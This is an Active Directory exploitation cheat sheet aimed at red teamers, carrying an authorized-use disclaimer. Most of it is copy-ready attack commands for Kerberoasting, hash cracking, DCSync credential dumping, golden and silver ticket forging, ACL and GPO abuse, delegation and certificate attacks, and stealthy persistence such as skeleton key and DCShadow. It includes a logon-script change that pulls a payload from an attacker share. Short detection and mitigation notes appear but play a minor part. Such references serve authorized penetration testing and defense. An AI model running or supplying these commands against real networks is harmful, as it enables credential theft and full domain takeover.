โ† All cheat sheets

AD-EXPLOITATION

Authorized use only. Offensive reference for systems you own or are explicitly permitted to test. You are responsible for staying within the law.

OVERVIEW#

Active Directory (AD) is the backbone of most enterprise Windows networks.
This cheatsheet covers common AD attack paths, exploitation techniques,
and persistence mechanisms used during red team engagements.

ENUMERATION (PRE-EXPLOITATION)#

  # BloodHound collection
  SharpHound.exe -c All --outputdirectory C:\temp
  bloodhound-python -c All -u user -p pass -d domain.local -ns DC_IP

  # PowerView
  Get-DomainUser -SPN                    # Find Kerberoastable users
  Get-DomainUser -PreauthNotRequired     # Find AS-REP roastable users
  Get-DomainComputer -Unconstrained      # Find unconstrained delegation
  Get-DomainUser -TrustedToAuth          # Find constrained delegation
  Get-DomainGPO | Get-ObjectAcl          # GPO permissions
  Find-InterestingDomainAcl              # DACL misconfigurations

  # LDAP queries (ldapsearch)
  ldapsearch -x -H ldap://DC_IP -D "user@domain.local" -w pass -b "DC=domain,DC=local" "(servicePrincipalName=*)" samaccountname,serviceprincipalname

  # Enum4linux-ng
  enum4linux-ng -A TARGET

KERBEROASTING#

Request service tickets for accounts with SPNs, then crack offline.
Any authenticated domain user can perform this attack.

  # Impacket
  GetUserSPNs.py domain.local/user:pass -dc-ip DC_IP -request -outputfile kerberoast.txt

  # Rubeus
  Rubeus.exe kerberoast /outfile:kerberoast.txt
  Rubeus.exe kerberoast /user:svc_account /outfile:kerberoast.txt

  # PowerView + Invoke-Kerberoast
  Invoke-Kerberoast -OutputFormat hashcat | Select Hash | Out-File kerberoast.txt

  # Crack with Hashcat (mode 13100 for TGS-REP)
  hashcat -m 13100 kerberoast.txt wordlist.txt -r rules/best64.rule

  # Crack with John
  john --format=krb5tgs kerberoast.txt --wordlist=wordlist.txt

  Mitigation: Use 25+ char passwords for service accounts, use gMSA, avoid
  setting SPNs on privileged accounts.

AS-REP ROASTING#

Target accounts with Kerberos pre-authentication disabled.
Request AS-REP and crack offline.

  # Impacket (no creds needed if you have a username list)
  GetNPUsers.py domain.local/ -dc-ip DC_IP -usersfile users.txt -no-pass -outputfile asrep.txt

  # Rubeus
  Rubeus.exe asreproast /outfile:asrep.txt
  Rubeus.exe asreproast /user:targetuser /outfile:asrep.txt

  # Crack with Hashcat (mode 18200 for AS-REP)
  hashcat -m 18200 asrep.txt wordlist.txt -r rules/best64.rule

  Mitigation: Enable pre-authentication for all accounts, monitor for
  Event 4768 with pre-auth type 0.

DCSYNC#

Replicate domain controller data using Directory Replication Service (DRS).
Requires: Replicating Directory Changes + Replicating Directory Changes All.

  # Mimikatz
  lsadump::dcsync /domain:domain.local /user:krbtgt
  lsadump::dcsync /domain:domain.local /user:Administrator
  lsadump::dcsync /domain:domain.local /all /csv

  # Impacket
  secretsdump.py domain.local/user:pass@DC_IP
  secretsdump.py -hashes :NTLM_HASH domain.local/user@DC_IP
  secretsdump.py -just-dc-ntlm domain.local/user:pass@DC_IP

  Detection: Event 4662 with Replication-Get-Changes-All property,
  DRS requests from non-DC sources.

GOLDEN TICKET#

Forge a TGT using the krbtgt hash. Grants access to any resource in the domain.

  # Mimikatz
  kerberos::golden /user:Administrator /domain:domain.local /sid:S-1-5-21-DOMAIN-SID /krbtgt:KRBTGT_NTLM_HASH /ptt
  # With AES key (stealthier)
  kerberos::golden /user:Administrator /domain:domain.local /sid:S-1-5-21-DOMAIN-SID /aes256:AES_KEY /ptt

  # Impacket
  ticketer.py -nthash KRBTGT_HASH -domain-sid S-1-5-21-DOMAIN-SID -domain domain.local Administrator
  export KRB5CCNAME=Administrator.ccache
  psexec.py -k -no-pass domain.local/Administrator@DC

  # Rubeus
  Rubeus.exe golden /rc4:KRBTGT_HASH /user:Administrator /domain:domain.local /sid:S-1-5-21-DOMAIN-SID /ptt

  Detection: TGT with abnormally long lifetime, Event 4769 with unusual
  encryption type, PAC validation failures.

SILVER TICKET#

Forge a TGS for a specific service using the service account's hash.
More targeted than Golden Ticket (no KDC interaction needed).

  # Mimikatz
  kerberos::golden /user:Administrator /domain:domain.local /sid:S-1-5-21-DOMAIN-SID /target:server.domain.local /service:cifs /rc4:SERVICE_NTLM_HASH /ptt

  # Impacket
  ticketer.py -nthash SERVICE_HASH -domain-sid S-1-5-21-DOMAIN-SID -domain domain.local -spn cifs/server.domain.local Administrator

  Common services: cifs, http, mssql, ldap, host, rpcss

  Detection: TGS without prior TGT request, PAC validation.

DACL ABUSE#

Exploit misconfigured Access Control Lists on AD objects.

  GenericAll on User:
    # Reset password
    net user targetuser NewPass123! /domain
    # Set SPN for Kerberoasting
    Set-DomainObject -Identity targetuser -Set @{serviceprincipalname='nonexistent/YOURSERVICE'}
    # Targeted Kerberoasting
    Rubeus.exe kerberoast /user:targetuser

  GenericAll on Group:
    # Add yourself to the group
    net group "Domain Admins" youruser /add /domain
    Add-DomainGroupMember -Identity "Domain Admins" -Members youruser

  GenericWrite on User:
    # Set SPN for Kerberoasting
    # Modify logon script
    Set-DomainObject -Identity targetuser -Set @{scriptpath='\\ATTACKER\share\payload.exe'}

  WriteDACL:
    # Grant yourself DCSync rights
    Add-DomainObjectAcl -TargetIdentity "DC=domain,DC=local" -PrincipalIdentity youruser -Rights DCSync

  WriteOwner:
    # Take ownership, then modify DACL
    Set-DomainObjectOwner -Identity targetobject -OwnerIdentity youruser

  ForceChangePassword:
    # Reset user's password without knowing current
    Set-DomainUserPassword -Identity targetuser -AccountPassword (ConvertTo-SecureString 'NewPass123!' -AsPlainText -Force)

GPO ABUSE#

Exploit permissions on Group Policy Objects to execute code domain-wide.

  # Enumerate GPO permissions
  Get-DomainGPO | Get-ObjectAcl | ? {$_.ActiveDirectoryRights -match "WriteProperty|GenericAll"}

  # SharpGPOAbuse - add immediate scheduled task
  SharpGPOAbuse.exe --AddComputerTask --TaskName "Update" --Author "NT AUTHORITY\SYSTEM" --Command "cmd.exe" --Arguments "/c payload.exe" --GPOName "Vulnerable GPO"

  # SharpGPOAbuse - add local admin
  SharpGPOAbuse.exe --AddLocalAdmin --UserAccount youruser --GPOName "Vulnerable GPO"

  # Force GPO update
  gpupdate /force

DELEGATION ATTACKS#

Unconstrained Delegation:
  # Server stores user's TGT; can impersonate any user who connects
  # Find unconstrained delegation computers
  Get-DomainComputer -Unconstrained
  # Use SpoolSample/PrinterBug to coerce DC authentication
  SpoolSample.exe DC_NAME UNCONSTRAINED_HOST
  # Monitor for TGT with Rubeus
  Rubeus.exe monitor /interval:5 /nowrap
  # Pass the captured TGT
  Rubeus.exe ptt /ticket:BASE64_TICKET

Constrained Delegation:
  # Service can impersonate users to specific services
  # Find constrained delegation
  Get-DomainUser -TrustedToAuth
  Get-DomainComputer -TrustedToAuth
  # Rubeus S4U attack
  Rubeus.exe s4u /user:svc_account /rc4:HASH /impersonateuser:Administrator /msdsspn:cifs/target.domain.local /ptt
  # Impacket
  getST.py -spn cifs/target.domain.local -impersonate Administrator domain.local/svc_account:pass

Resource-Based Constrained Delegation (RBCD):
  # Requires write access to target's msDS-AllowedToActOnBehalfOfOtherIdentity
  # Create computer account (default: any user can create up to 10)
  addcomputer.py -computer-name 'FAKE$' -computer-pass 'Password123' domain.local/user:pass
  # Set RBCD
  rbcd.py -delegate-from 'FAKE$' -delegate-to 'TARGET$' -action write domain.local/user:pass
  # Get ticket
  getST.py -spn cifs/TARGET.domain.local -impersonate Administrator domain.local/'FAKE$':'Password123'

CERTIFICATE ABUSE (AD CS)#

Active Directory Certificate Services exploitation.

  # Enumerate with Certipy
  certipy find -u user@domain.local -p pass -dc-ip DC_IP

  ESC1 - Enrollee supplies subject (SAN)
    certipy req -u user@domain.local -p pass -ca CA-NAME -template VulnTemplate -upn administrator@domain.local
    certipy auth -pfx administrator.pfx

  ESC2 - Any Purpose EKU or SubCA template
    # Similar to ESC1 but exploits Any Purpose or SubCA EKU

  ESC3 - Enrollment Agent template abuse
    # Enroll in agent cert, then use it to enroll on behalf of another user

  ESC4 - Vulnerable template ACL
    # Modify template to enable ESC1 conditions, then exploit

  ESC6 - EDITF_ATTRIBUTESUBJECTALTNAME2 flag on CA
    # CA allows SAN specification in any request
    certipy req -u user@domain.local -p pass -ca CA-NAME -template User -upn administrator@domain.local

  ESC7 - Vulnerable CA ACL (ManageCA/ManageCertificates)
    # Use ManageCA to enable ESC6 flag, then exploit

  ESC8 - NTLM Relay to AD CS HTTP endpoint
    # Coerce authentication and relay to /certsrv/certfnsh.asp
    ntlmrelayx.py -t http://CA-SERVER/certsrv/certfnsh.asp -smb2support --adcs --template DomainController

  # Authenticate with certificate
  certipy auth -pfx cert.pfx -dc-ip DC_IP

PERSISTENCE MECHANISMS#

Skeleton Key:
  # Injects into LSASS on DC; allows auth with master password
  # Requires DA or SYSTEM on DC
  mimikatz# privilege::debug
  mimikatz# misc::skeleton
  # Now authenticate as any user with password "mimikatz"
  # Does NOT survive DC reboot

AdminSDHolder:
  # Modify AdminSDHolder ACL; propagates to all protected groups every 60 min
  Add-DomainObjectAcl -TargetIdentity "CN=AdminSDHolder,CN=System,DC=domain,DC=local" -PrincipalIdentity youruser -Rights All
  # Wait 60 minutes (or trigger SDProp manually)

DCShadow:
  # Register rogue DC and push changes via replication
  # Requires DA privileges
  mimikatz# lsadump::dcshadow /object:targetuser /attribute:primaryGroupID /value:512
  # In another Mimikatz instance
  mimikatz# lsadump::dcshadow /push

SID History:
  # Add Domain Admin SID to a regular user's SID history
  mimikatz# sid::patch
  mimikatz# sid::add /sam:youruser /new:S-1-5-21-DOMAIN-SID-512

Security Descriptor Persistence:
  # Add hidden DACL entry for remote WMI/PSRemoting access
  Set-RemoteWMI -UserName youruser -ComputerName DC -Credential $cred
  Set-RemotePSRemoting -UserName youruser -ComputerName DC -Credential $cred

ESSENTIAL TOOLS#

  BloodHound/SharpHound  - AD relationship mapping and attack path analysis
  Mimikatz               - Credential extraction, ticket forging, DCSync
  Rubeus                 - Kerberos attacks (roasting, S4U, ticket manipulation)
  Impacket               - Python tools for AD protocols (secretsdump, getST, etc.)
  Certipy                - AD CS enumeration and exploitation
  PowerView              - AD enumeration via PowerShell
  CrackMapExec/NetExec   - Swiss army knife for AD exploitation
  SharpGPOAbuse          - GPO exploitation
  Whisker                - Shadow Credentials attack
  KrbRelayUp             - Local privilege escalation via Kerberos relay

ATTACK PATH SUMMARY#

  1. Enumerate (BloodHound, PowerView, ldapsearch)
  2. Kerberoast / AS-REP roast for initial credentials
  3. Check DACL misconfigurations for privilege paths
  4. Exploit delegation for impersonation
  5. Check AD CS for certificate abuse
  6. DCSync for full domain hash extraction
  7. Golden Ticket for persistent domain access
  8. Establish persistence (AdminSDHolder, SID History, certs)